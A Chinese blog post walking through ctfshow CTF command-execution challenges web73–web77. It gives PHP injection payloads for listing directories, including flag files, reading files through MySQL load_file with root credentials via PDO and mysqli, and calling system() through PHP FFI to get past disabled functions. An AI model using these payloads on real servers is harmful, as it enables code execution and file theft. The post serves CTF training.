ctfshow-命令执行(web73-web77)

最新推荐文章于 2024-07-01 17:16:04 发布
最新推荐文章于 2024-07-01 17:16:04 发布
阅读量446 收藏 2
点赞数 14
分类专栏: 命令执行 CTFSHOW 文章标签: 命令执行 PHP 渗透测试 ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72125469/article/details/135776566
版权

web73

用不了上一题的通用poc了 因为禁用了strlen 但是可以改一个函数自定义一个函数只要是能实现strlen效果即可

c=var_export(scandir('/'));exit(0);

根目录下有一个flagc.txt文件

c=include('/flagc.txt');exit(0);

web74

禁用了scandir函数 

那就使用web72的glob协议 查看目录下文件

直接包含这个文件

web75

和上一题一样 

文件换成了flag36.txt 但是禁用了include函数

直接ai搜索 和include一样的函数有哪些

require也不行 file_get_contents函数也不行 

判断当前数据库

c=$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select group_concat(SCHEMA_NAME) from SCHEMATA");
foreach($rs as $row){
        echo($row[0])."|"; 
}exit();

那就用数据库读

c=$conn = mysqli_connect("127.0.0.1", "root", "root", "ctftraining"); $sql = "select load_file('/flag36.txt') as a"; $row = mysqli_query($conn, $sql); while($result=mysqli_fetch_array($row)){ echo $result['a']; } exit();

web76

同理 用glob协议 然后用数据库读

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36d.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

web77

使用数据库连接的时候报错

但是报 could not find driver的错误,表明此题无法使用PDO连接数据库

查看writeup,此题利用的是PHP 7.4+的FFI特性,即外部函数接口特性

提示 看来这个很牛呀

同理使用glob扫目录 发现flag36x.txt和readflag 但是文件包含都不行了

那就是用提示说的FFI特性 简单理解就是通过FFI,可以实现调用system函数,从而执行命令

c=$ffi = FFI::cdef("int system(const char *command);");
$a='/readflag > 1.txt';
$ffi->system($a);

Hello-smile
关注
  • 14
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow 命令执行 web75
Kradress的博客
12-06 1203
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been dis
ctfshow web入门 命令执行web75-77
weixin_44700621的博客
06-20 1545
ctfshow web入门 命令执行 web75web77题简单分析
ctfshow-web入门-命令执行web75-web77
最新发布
Welcome To Myon'Blog !
07-01 1268
利用 mysql load_file 读文件,提示中是从数据库 ctftraining 中查询的,就算我们不知道这个数据库名,也可以直接从默认的 information_schema 中查,该数据库包含了所有的数据库的内容。(readflag 这个东西在前面的题里面遇到过,它是一个可执行的二进制文件,执行它即可获取 flag,这里为什么要用这个 readflag 而不是直接读取 flag36x.txt 我们后面再说)接下来的三个字符 r-- 表示文件所有者(root)具有读取权限,但没有写入或执行权限。
ctfshow web75
weixin_74336671的博客
01-27 451
在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。# 创建 PDO 实例, 连接 MySQL 数据库。先直接用伪协议获取 flag 位置。
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 2016
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshow刷题日记-WEB-命令执行下55-77
Love&Share
09-04 3470
web55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } 不能出现英文字符 方法1 ?c=/???/????64 ???????? 但是这个不是通用的,base64不是每个机器都用 方法2 bzip2的使用 bzip2是linux下面的压缩文件的命令 我们可以通过该命令压缩fla
ctfshow web入门 命令执行
qq_53263789的博客
07-19 1490
ctfshow
ctfshow web入门 命令执行后篇(web55-web188)
ccfly1012的博客
09-04 1954
web55 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ // 你们在炫技吗? if(isset($_GET['c']..
CTFshow 命令执行 web73
Kradress的博客
12-06 381
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been dis
ctfshow web(不定期更新)
pakho_C的博客
09-23 2729
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php://input将会无效。MD5弱等于绕过:有些字符md5后的值为0e开头,会被当做科学计数法,也就是0.所以当找到2个字符md5后的值都为0e开头时即可绕过。绕过方法:如果是以数字开头的字符串,使用is_numeric的时候会自动去掉后面的字符,将其前面的数字取出来判断。web3的升级,过滤了php伪协议,使用日志注入。
ctfshow命令执行 web入门 web69-web73
m0_62207170的博客
04-09 378
ctfshow web入门命令执行web69-73
ctfshow-web入门72-74
m0_73303597的博客
01-09 571
自用
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
Firebasky的博客
09-18 1800
1. web58-65 payload:c=show_source('flag.php'); 2. web66 1.查看flag文件 c=print_r(scandir("/")); c=highlight_file('/flag.txt'); 3. web67 盲猜 c=highlight_file('/flag.txt'); 4. web68-70 尝试include('index.php'); 发现字节太大了 直接盲猜c=include('/flag.txt'); 5. web71 <?php
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello-smile

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值